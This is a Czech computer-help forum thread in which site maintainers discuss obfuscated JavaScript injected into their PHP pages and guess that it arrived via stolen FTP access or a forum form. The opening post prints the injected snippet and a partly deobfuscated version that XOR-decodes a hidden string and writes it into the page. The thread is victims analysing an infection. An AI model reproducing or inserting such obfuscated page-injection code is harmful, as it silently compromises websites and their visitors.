» Poradna » Počítačové sítě

Vir? měnící webové stránky

 |   | 

Dobrý den,

dneska ráno mě nemile překvapila následující věc. Na dvou webech, které občas pomáhám udržovat, byly nepochopitelné chyby. Nevěděl jsem proč, ale následně jsem v HTML kódu (v PHP skriptech) obou z nich objevil následující kód:




Nechápu, jak se tam dostal. V zálohách jsem nic takového neměl, takže oprava byla rychlá, ale děsí mě, že nevím, čím se to stalo. Předpokládám, že chyba bude někde u mě, protože oba dva weby běží na hostingu jiné firmy, takže nepředpokládám, že by se někdo naboural přímo do serverů.

Spíše teda předpokládám, že mám v pc něco, co dokázalo ty skripty změnit prostřednictvím FTP. Nenapadá mě totiž ani nikdo jiný, kdo by kromě mě mohl mít FTP přístup k oběma serverům....

Zkoušel jsem se dívat různě po netu, jestli nenarazím na podobný problém. Našel jsem něco zde: www.webhostingtalk.com ... ale bohužel tam si nikdo nevěděl rady.

Tak se chci zeptat, jestli někdo netušíte, co to může způsobovat? Nebo jestli nevíte, kde bych našel nějaké informace?

Odpovědi na otázku

 |   | 

Koukám, že se mi tady ten kód nevložil, snad to teď dopadne lépe:

<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28hzK
.... nepíšu sem celý kód, má přes 4kB ....
h%28JYi%29%7B%7D%7Dvar%20hzK%3D1%3C/script%3E"))</script><!--[/z0s]-->

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Neni to nejaka reklama hostingove firmy?

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Tak to nevím, ten skript negeneruje nic viditelného, žádnou reklamu, takže nepředpokládám.

Projel jsem ten kód a vypreparoval z něho toto:

<script>
if(hzK!=1){
function RC(Ef){
return Ef
}
try{
var WD='',Om=WD.substr(2,1);
var ve=Array(dm('187'),7639^7459,dm('228'),3092^3297,29669^29451, dm('247'),dm('243'),dm('185'),23196^23165,22421^22375,5280^5193,dm('232'), 2236^2075,dm('200'),32672^32607,13646^13793,23352^23539,28825^28751, 27546^27441,dm('202'),28885^28729,dm('174'),27683^27871,3948^3997,dm('230'), 15922^16109,14355^14579,16239^16287,16495^16597,dm('226'),dm('195'), 17002^17025,12038^12235,401^301,dm('169'),2458^2377,dm('234'),dm('172'), dm('191'),15898^16043,16248^16331,13830^14001,dm('227'),dm('165'),dm('192'), 12483^12311,19335^19325,dm('215'),18213^18309,dm('182'),dm('221'),6932^7121, 30473^30671,11947^11881,dm('168'),dm('239'),15585^15435,27460^27641, 29683^29525,20303^20471,11427^11391,dm('217'),23676^23681,7883^7797, dm('218'),dm('219'),19761^19919,5026^4935,24503^24323,18986^19103, 13127^13187,dm('141'),8024^8077,19423^19309,dm('176'),8318^8375, 5604^5385,dm('173')),Ho;
var xu,nW;
var yC='',Qx='';
WD=WD.split(Om);
for (Ho=0;Ho<yC.length;Ho+=2){
nW=yC.substr(Ho,2);
for(xu=0;xu<WD.length;xu++){
if(WD[xu]==nW) break;
}
Qx+=String.fromCharCode(ve[xu]^135);
}

function dm(OB){
return parseInt(OB)
}
document.write(Qx);
}
catch(MH){}
}
var hzK=1
</script>

akorát moc mi to teda neříká, co by to jako mělo dělat...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Neco k tomu je tady: navody.c4.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

jop dnes sa mi stalo presne to iste .. heslo na ftp som mal 39 znakove zlozene z vsetkych moznych znakov ale napriek tomu sa tam ten kod nejako dostal

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Mal som niečo podobné, obnovil som web zo zálohy ale u všetkých súborov som zmenil atribút len na čítanie a pomohlo to.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Zdravím. Asi 3 dny se k tomu nemohu dostat, ale dnes už mne to přinutilo podívat se na ten virusek.. Mám to taky na svých stránkách a odhaduji, že se to tam dostalo přes formulář v diskusním foru. Krátkou dobu se tam někomu daří vkládat nesmyslné odkazy a jsem si jistý, že tímhle se to tam podařilo vpravit až na server do php souborů. Nic, jdu studovat internet, kdyžtak se ještě ozvu, co teda s tím.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

docela super antivirak a zadara zkoušel jsem ho mužu jen doporučit www.sosej.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět

Související témata: Následující věc




Určitě si přečtěte

USB-C už mělo být všude, ale není. Tak kde to vázne?

USB-C už mělo být všude, ale není. Tak kde to vázne?

** Konektor USB-C byl představen už před čtyřmi roky ** Praktické univesrzální rozhraní však stále není rozšířeno ** Výrobcům hardwaru se do změny moc nechce

David Polesný, Vladislav Kluska | 87

Galerie: Navštívili jsme Cosmos Discovery. Uvidíte Sojuz, Mir i kokpit raketoplánu

Galerie: Navštívili jsme Cosmos Discovery. Uvidíte Sojuz, Mir i kokpit raketoplánu

** Brno hostí do konce léta unikátní výstavu Cosmos Discovery ** Uvidíte zde celou historii kosmonautiky ** Stovky originálů i detailních maket

Jakub Čížek, Antonín Trčálek | 4

Šmírování kamerami Googlu: Koukněte se, co zachytily na Street View

Šmírování kamerami Googlu: Koukněte se, co zachytily na Street View

Google stále fotí celý svět do své služby Street View. A novodobou zábavou je hledat v mapách Googlu vtipné záběry. Podívejte se na výběr nejlepších!

redakce | 44

Sex a rozmnožování při mezihvězdné cestě: Kolik lidí je potřeba pro let k Proximě Centauri?

Sex a rozmnožování při mezihvězdné cestě: Kolik lidí je potřeba pro let k Proximě Centauri?

** Vědci spočítali, jak velká by musela být posádka pro vícegenerační let k nejbližší hvězdné soustavě ** Proxima Centauri se nachází 4,3 světelných let od nás ** Za současných technologií bychom k ní letěli 6300 let

Petr Kubala | 58

Nechcete platit za Total Commander? Těmito bezplatnými programy ho můžete nahradit

Nechcete platit za Total Commander? Těmito bezplatnými programy ho můžete nahradit

** Total Commander je na Windows takřka legendou ** Licence však stojí více než tisíc korun ** Našli jsme pro vás deset alternativ dostupných zdarma

Karel Kilián | 144

Xiaomi Yeelight: Wi-Fi LED žárovka za pár stovek, kterou můžete ovládat i hlasem

Xiaomi Yeelight: Wi-Fi LED žárovka za pár stovek, kterou můžete ovládat i hlasem

** Na eBayi aspol. ji koupíte za čtyři stovky ** Má Wi-Fi a povedenou appku ** Spojíte ji s Googlem, Amazonem, IFTTT i vlastním systémem

Jakub Čížek | 42

Alan Turing: Genius, který matematicky stvořil počítač

Alan Turing: Genius, který matematicky stvořil počítač

Řešením matematického problému se dostal k modelu teoretického stroje, který nese jeho jméno a je základem logiky univerzálních počítačů.

Pavel Tronner | 58


Aktuální číslo časopisu Computer

Jak mobily určují svoji polohu?

Velký test notebooků pro studenty

Nejlepší reproduktory na párty

Služby a aplikace pro výuku angličtiny